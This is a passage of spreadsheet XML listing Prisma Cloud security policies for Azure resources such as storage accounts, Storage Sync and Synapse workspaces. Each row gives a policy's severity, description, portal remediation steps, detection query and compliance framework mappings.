      </c>
      <c r="AB2470" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:41</t>
        </is>
      </c>
      <c r="AC2470" t="inlineStr"/>
      <c r="AD2470" t="b">
        <v>1</v>
      </c>
      <c r="AE2470" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2470" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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70" t="inlineStr">
        <is>
          <t>6816dad1-7b88-4b61-b226-772f9b19de22</t>
        </is>
      </c>
      <c r="AI2470" t="inlineStr">
        <is>
          <t>83983a28-c9bc-4d05-bc25-f37a8cde2058</t>
        </is>
      </c>
      <c r="AJ2470" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2470" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2471">
      <c r="A2471" t="inlineStr"/>
      <c r="B2471" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2471" s="2" t="inlineStr"/>
      <c r="D2471" t="inlineStr"/>
      <c r="E2471" t="inlineStr"/>
      <c r="F2471" t="inlineStr"/>
      <c r="G2471" t="b">
        <v>1</v>
      </c>
      <c r="H24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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2471" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2471" t="inlineStr">
        <is>
          <t>Sensitive machine learning data exposure risk due to publicly exposed Azure Storage account containing sensitive high business impact machine learning data</t>
        </is>
      </c>
      <c r="L2471" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2471" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2471" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2471" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2471" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2471" t="inlineStr"/>
      <c r="R2471" t="inlineStr"/>
      <c r="S2471" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2471" t="b">
        <v>0</v>
      </c>
      <c r="U2471" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2471" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2471" t="inlineStr">
        <is>
          <t>This policy identifies sensitive machine learning data exposure risk due to publicly exposed Azure Storage accounts containing sensitive high business impact machine learning data.
Azure Storage account stores machine learning artifacts such as job logs. By default, this storage account is used when you upload data to the workspace. The attacker could exploit a publicly accessible storage account to get machine learning workspace high business impact data logs and could breach into the system by leveraging the data exposed. Proper access control and data protection measures should be in place to prevent potential compromise of critical data.
Immediate attention is required to restrict public exposure reported for the Storage account as soon as possible and enforce stricter access methods for the reported Storage account as it contains sensitive machine learning data.</t>
        </is>
      </c>
      <c r="X2471"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[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2471" t="inlineStr"/>
      <c r="Z2471" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure Storage Account storing Machine Learning workspace high business impact data is publicly accessible','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2471" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2471" t="inlineStr">
        <is>
          <t>2024-03-20 06:34:26</t>
        </is>
      </c>
      <c r="AC2471" t="inlineStr"/>
      <c r="AD2471" t="b">
        <v>1</v>
      </c>
      <c r="AE2471" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2471" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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1" t="inlineStr">
        <is>
          <t>da79cc96-5e00-4423-9a44-52ce796198b2</t>
        </is>
      </c>
      <c r="AI2471" t="inlineStr">
        <is>
          <t>34eb0db5-cd28-4ce4-b45c-2513d910f49f</t>
        </is>
      </c>
      <c r="AJ2471" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2471" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2472">
      <c r="A2472" t="inlineStr"/>
      <c r="B2472" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2472" s="2" t="inlineStr"/>
      <c r="D2472" t="inlineStr"/>
      <c r="E2472" t="inlineStr"/>
      <c r="F2472" t="inlineStr"/>
      <c r="G2472" t="b">
        <v>1</v>
      </c>
      <c r="H24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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2472" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2472" t="inlineStr">
        <is>
          <t>Potential data exfiltration risk due to abuse of SAS keys on a publicly exposed Azure Storage account configured with Shared key authorization and contains sensitive data</t>
        </is>
      </c>
      <c r="L2472" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE,DISCOVERY</t>
        </is>
      </c>
      <c r="M2472" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2472" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2472" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2472" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2472" t="inlineStr"/>
      <c r="R2472" t="inlineStr"/>
      <c r="S2472" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2472" t="b">
        <v>0</v>
      </c>
      <c r="U2472" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2472" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2472" t="inlineStr">
        <is>
          <t>This policy identifies potential data exfiltration risk due to abuse of SAS keys on a publicly exposed Azure Storage accounts configured with Shared key authorization and contains sensitive data.
Azure Storage accounts authorized with Shared Key authorization via Shared Access Signature (SAS) tokens pose a security risk, as they allow sharing information with external unidentified identities. The combination of public access permissions and Shared key authorization with sensitive data in the storage account increases the risk of unauthorized access and data exfiltration. Proper access control and data protection measures should be in place to prevent potential compromise of critical data.
Immediate attention is required to restrict public exposure reported for the Storage account as soon as possible, prevent use of Shared Key authorization and enforce stricter access methods for reported Storage account as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2472" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to 'Storage Accounts' dashboard
3. Select the reported storage account
4. Under 'Data storage' section, Select 'Containers'
5. Select the blob container you need to modify
6. Click on 'Change access level'
7. Set 'Public access level' to 'Private (no anonymous access)'
8. Click on 'OK'
[MISCONFIGURATION]
To change the default network access rule, follow below URL:
https://learn.microsoft.com/en-us/azure/storage/common/storage-network-security?tabs=azure-portal#change-the-default-network-access-rule 
[MISCONFIGURATION]
To prevent Shared Key authorization for an Azure Storage account, follow bellow URL:
https://learn.microsoft.com/en-us/azure/storage/common/shared-key-authorization-prevent 
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2472" t="inlineStr"/>
      <c r="Z2472" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure storage account has a blob container with public access','Azure Storage Account default network access is set to \'Allow\'','Azure Storage account configured with Shared Key authorization','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2472" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2472" t="inlineStr">
        <is>
          <t>2023-11-10 07:02:50</t>
        </is>
      </c>
      <c r="AC2472" t="inlineStr"/>
      <c r="AD2472" t="b">
        <v>1</v>
      </c>
      <c r="AE2472" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2472" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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2" t="inlineStr">
        <is>
          <t>0dcd050c-d5d2-4ee3-b37a-af3f2d1d811e</t>
        </is>
      </c>
      <c r="AI2472" t="inlineStr">
        <is>
          <t>6a4a8d51-11a7-4e6c-9244-077d45f39d69</t>
        </is>
      </c>
      <c r="AJ2472" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2472" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2473">
      <c r="A2473" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2473" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2473" s="2" t="inlineStr"/>
      <c r="D2473" t="inlineStr"/>
      <c r="E2473" t="inlineStr"/>
      <c r="F2473" t="inlineStr"/>
      <c r="G2473" t="b">
        <v>1</v>
      </c>
      <c r="H24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73" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2473" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2473" t="inlineStr">
        <is>
          <t>Azure Storage account diagnostic setting for file is disabled</t>
        </is>
      </c>
      <c r="L2473" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2473" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2473" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2473" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2473" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2473" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2473" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2473" t="inlineStr"/>
      <c r="T2473" t="b">
        <v>0</v>
      </c>
      <c r="U2473" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2473" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2473" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage account files that have diagnostic logging disabled.
By enabling diagnostic settings, you can capture various types of activities and events occurring within these storage account files. These logs provide valuable insights into the operations, performance, and security of the storage account files.
As a best practice, it is recommended to enable diagnostic logs on all storage account files.</t>
        </is>
      </c>
      <c r="X2473" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to the Storage Accounts dashboard
3. Click on the reported Storage account
4. Under the 'Monitoring' menu, click on 'Diagnostic settings'
5. Select the file resource
6. Under 'Diagnostic settings', click on 'Add diagnostic setting'
7. At the top, enter the 'Diagnostic setting name'
8. Under 'Logs', select all the checkboxes under 'Categories'
9. Under 'Destination details', select the destination for logging
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2473" t="inlineStr"/>
      <c r="Z2473" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = properties.provisioningState equal ignore case Succeeded as X; config from cloud.resource where api.name = 'azure-storage-account-file-diagnostic-settings' AND json.rule = properties.logs[*].enabled all true as Y; filter 'not($.X.name equal ignore case $.Y.StorageAccountName)'; show X;</t>
        </is>
      </c>
      <c r="AA2473" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2473" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2473" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1282</t>
        </is>
      </c>
      <c r="AD2473" t="b">
        <v>1</v>
      </c>
      <c r="AE2473" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2473" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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73" t="inlineStr">
        <is>
          <t>e3fdbe1d-485f-489c-8578-7895be459bea</t>
        </is>
      </c>
      <c r="AI2473" t="inlineStr">
        <is>
          <t>51e41e57-a3d5-415d-b517-f8db173bdc9e</t>
        </is>
      </c>
      <c r="AJ2473" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2473" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2474">
      <c r="A2474" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, ISO/IEC 27001:2022, ISO/IEC 27001:2022, CRI Profile v2.0, NIST CSF v2.0, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8.1, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, CIS Controls v7.1, CRI Profile v1.2.1, CIS v1.5.0 (Azure) - Level 1, Copy of CIS Controls v8, ISO 27002:2022, ACSC Information Security Manual (ISM), SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, CIS Controls v7.1, PCI DSS v4.0, DORA, NIST CSF v2.0, PCI DSS v4.0, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, kashan ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), CRI Profile v1.2.1, kfirdaus AWS Account-CS, CRI Profile v2.0, SOC 2, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, CIS Controls v8.1, CIS v2.1.0 (Azure) Level 1, CIS v1.4.0 (Azure), RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, CIS v2.0.0 (Azure) Level 1</t>
        </is>
      </c>
      <c r="B2474" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2474" s="2" t="inlineStr"/>
      <c r="D2474" t="inlineStr"/>
      <c r="E2474" t="inlineStr"/>
      <c r="F2474" t="inlineStr"/>
      <c r="G2474" t="b">
        <v>1</v>
      </c>
      <c r="H24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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2474" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2474" t="inlineStr">
        <is>
          <t>Azure Storage Account using insecure TLS version</t>
        </is>
      </c>
      <c r="L2474" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2474" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2474" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2474" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2474" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2474" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2474" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S2474" t="inlineStr"/>
      <c r="T2474" t="b">
        <v>0</v>
      </c>
      <c r="U2474" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2474" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2474" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage Account which is using insecure TLS version. Azure Storage Account uses Transport Layer Security (TLS) from communication with client applications. As a best security practice, use newer TLS version as the minimum TLS version for Azure Storage Account. Currently, Azure Storage Account supports TLS 1.2 version which resolves the security gap from its preceding versions.
https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version?tabs=portal</t>
        </is>
      </c>
      <c r="X2474" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Storage accounts dashboard and Click on the reported storage account
3. Under the 'Settings' menu, click on 'Configuration'
4. Under 'Minimum TLS version' select 'Version 1.2' from the drop down
5. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-2</t>
        </is>
      </c>
      <c r="Y2474" t="inlineStr"/>
      <c r="Z2474" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = properties.supportsHttpsTrafficOnly is true and properties.minimumTlsVersion does not equal TLS1_2
{"category":"Storage","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA2474" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2474" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2474" t="inlineStr">
        <is>
          <t>PC-AZR-STO-746-CKV_AZURE_44</t>
        </is>
      </c>
      <c r="AD2474" t="b">
        <v>1</v>
      </c>
      <c r="AE2474" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2474" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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4" t="inlineStr">
        <is>
          <t>91389569-c060-44e0-9aef-f13dba594f3c</t>
        </is>
      </c>
      <c r="AI2474" t="inlineStr">
        <is>
          <t>57f1320f-33c3-461b-8e32-7fa873ae1d8e</t>
        </is>
      </c>
      <c r="AJ2474" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2474" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2475">
      <c r="A2475" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, TX-RAMP Level 1, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2475" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2475" s="2" t="inlineStr"/>
      <c r="D2475" t="inlineStr"/>
      <c r="E2475" t="inlineStr"/>
      <c r="F2475" t="inlineStr"/>
      <c r="G2475" t="b">
        <v>1</v>
      </c>
      <c r="H24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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2475" t="inlineStr">
        <is>
          <t>azure-storage-sync</t>
        </is>
      </c>
      <c r="K2475" t="inlineStr">
        <is>
          <t>Azure Storage Sync Service configured with overly permissive network access</t>
        </is>
      </c>
      <c r="L2475" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2475" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2475" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2475" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2475" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2475" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2475" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S2475" t="inlineStr"/>
      <c r="T2475" t="b">
        <v>0</v>
      </c>
      <c r="U2475" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2475" t="inlineStr">
        <is>
          <t>azure-storage-sync-service</t>
        </is>
      </c>
      <c r="W2475" t="inlineStr">
        <is>
          <t>This policy identifies Storage Sync Services configured with overly permissive network access.
A Storage Sync Service is a management construct that represents registered servers and sync groups. Allowing all traffic to the Sync Service may allow a bad actor to brute force their way into the system and potentially get access to the entire network. With a private endpoint, the network traffic path is secured on both ends and access is restricted to only defined authorized entities.
It is recommended to configure the Storage Sync Service with private endpoints to minimize the access vector.</t>
        </is>
      </c>
      <c r="X2475" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Storage Sync Services dashboard 
3. Click on the reported Storage Sync Service
4. Under the 'Settings' menu, click on 'Network'
5. Under 'Allow access from' select 'Private endpoints only'
6. Click on 'Private endpoint' and Create a private endpoint with required parameters 
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2475" t="inlineStr"/>
      <c r="Z2475" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-sync-service' AND json.rule = properties.provisioningState equals Succeeded and properties.incomingTrafficPolicy equals AllowAllTraffic</t>
        </is>
      </c>
      <c r="AA2475" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2475" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2475" t="inlineStr">
        <is>
          <t>PC-AZR-ASS-850</t>
        </is>
      </c>
      <c r="AD2475" t="b">
        <v>1</v>
      </c>
      <c r="AE2475" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2475" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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5" t="inlineStr">
        <is>
          <t>ddf89efb-979f-412d-8e62-5ffa8d388e2c</t>
        </is>
      </c>
      <c r="AI2475" t="inlineStr">
        <is>
          <t>3c244889-e2d5-4f56-93cc-4cd135ccce47</t>
        </is>
      </c>
      <c r="AJ2475" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2475" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2476">
      <c r="A2476" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CIS v2.1.0 (Azure) Level 2, Microsoft Cloud Security Benchmark v1, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, CIS v2.0.0 (Azure) Level 2, NYDFS 23 CRR-NY 500.0</t>
        </is>
      </c>
      <c r="B2476" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2476" s="2" t="inlineStr"/>
      <c r="D2476" t="inlineStr"/>
      <c r="E2476" t="inlineStr"/>
      <c r="F2476" t="inlineStr"/>
      <c r="G2476" t="b">
        <v>0</v>
      </c>
      <c r="H247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76" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2476" t="inlineStr">
        <is>
          <t>azure-subscription-tenantpolicy</t>
        </is>
      </c>
      <c r="K2476" t="inlineStr">
        <is>
          <t>Azure subscription permission for Microsoft Entra tenant is set to 'Allow everyone'</t>
        </is>
      </c>
      <c r="L2476" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2476" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2476" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2476" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2476" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2476" t="inlineStr">
        <is>
          <t>500.2</t>
        </is>
      </c>
      <c r="R2476" t="inlineStr">
        <is>
          <t>500.02 (b) (2)</t>
        </is>
      </c>
      <c r="S2476" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2476" t="b">
        <v>0</v>
      </c>
      <c r="U2476" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2476" t="inlineStr">
        <is>
          <t>azure-subscription-tenantpolicy</t>
        </is>
      </c>
      <c r="W2476" t="inlineStr">
        <is>
          <t>This policy identifies Microsoft Entra tenant that are not configured with restrictions for 'Subscription entering Microsoft Entra tenant' and 'Subscription leaving Microsoft Entra tenant'.
Users who are set as subscription owners can make administrative changes to the subscriptions and move them into and out of the Microsoft Entra tenant. Allowing subscriptions to enter or leave the Microsoft Entra tenant without restrictions can expose the organization to unauthorized access and potential security breaches.
As best practice, it is recommended to configure the settings for 'Subscription entering Microsoft Entra tenant' and 'Subscription leaving Microsoft Entra tenant' to 'Permit no one' to ensure only authorized subscriptions can interact with the tenant, thus enhancing the security of your Azure environment.</t>
        </is>
      </c>
      <c r="X2476" t="inlineStr">
        <is>
          <t>To configure policy settings to control the movement of Azure subscriptions from and into Microsoft Entra tenant follow the below URL:
https://learn.microsoft.com/en-us/azure/cost-management-billing/manage/manage-azure-subscription-policy#setting-subscription-policy</t>
        </is>
      </c>
      <c r="Y2476" t="inlineStr"/>
      <c r="Z2476" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-subscription-tenantpolicy' AND json.rule = properties.blockSubscriptionsIntoTenant is false or properties.blockSubscriptionsLeavingTenant is false</t>
        </is>
      </c>
      <c r="AA2476" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2476" t="inlineStr">
        <is>
          <t>2024-11-13 23:46:02</t>
        </is>
      </c>
      <c r="AC2476" t="inlineStr">
        <is>
          <t>PC-AZR-SRP-1243</t>
        </is>
      </c>
      <c r="AD2476" t="b">
        <v>1</v>
      </c>
      <c r="AE2476" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2476" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG247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76" t="inlineStr">
        <is>
          <t>dbea24f6-b89c-468e-88a0-0d9527f1cfb5</t>
        </is>
      </c>
      <c r="AI2476" t="inlineStr">
        <is>
          <t>4e932657-03ef-434b-b821-e2f7a92fb280</t>
        </is>
      </c>
      <c r="AJ2476" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2476" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2477">
      <c r="A2477" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, NYDFS 23 CRR-NY 500.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, NIST CSF v2.0, CRI Profile v2.0, NIST CSF v2.0, TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, DORA, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2477" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2477" s="2" t="inlineStr"/>
      <c r="D2477" t="inlineStr"/>
      <c r="E2477" t="inlineStr"/>
      <c r="F2477" t="inlineStr"/>
      <c r="G2477" t="b">
        <v>1</v>
      </c>
      <c r="H24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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2477" t="inlineStr">
        <is>
          <t>azure-synapse-workspace</t>
        </is>
      </c>
      <c r="K2477" t="inlineStr">
        <is>
          <t>Azure Synapse Workspace vulnerability assessment is disabled</t>
        </is>
      </c>
      <c r="L2477" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2477" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2477" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2477" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2477" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2477" t="inlineStr">
        <is>
          <t>Vulnerability &amp; Patch Management</t>
        </is>
      </c>
      <c r="R2477" t="inlineStr">
        <is>
          <t>VPM-06:Vulnerability Scanning</t>
        </is>
      </c>
      <c r="S2477" t="inlineStr"/>
      <c r="T2477" t="b">
        <v>0</v>
      </c>
      <c r="U2477" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2477" t="inlineStr">
        <is>
          <t>azure-synapse-workspace</t>
        </is>
      </c>
      <c r="W2477" t="inlineStr">
        <is>
          <t>This policy identifies Azure Synpase workspace which has Vulnerability Assessment setting disabled. Vulnerability Assessment service scans Synapse workspaces for known security vulnerabilities and highlight deviations from best practices, such as misconfigurations, excessive permissions, and unprotected sensitive data. It is recommended to enable Vulnerability assessment on Synapse workspaces.</t>
        </is>
      </c>
      <c r="X2477" t="inlineStr">
        <is>
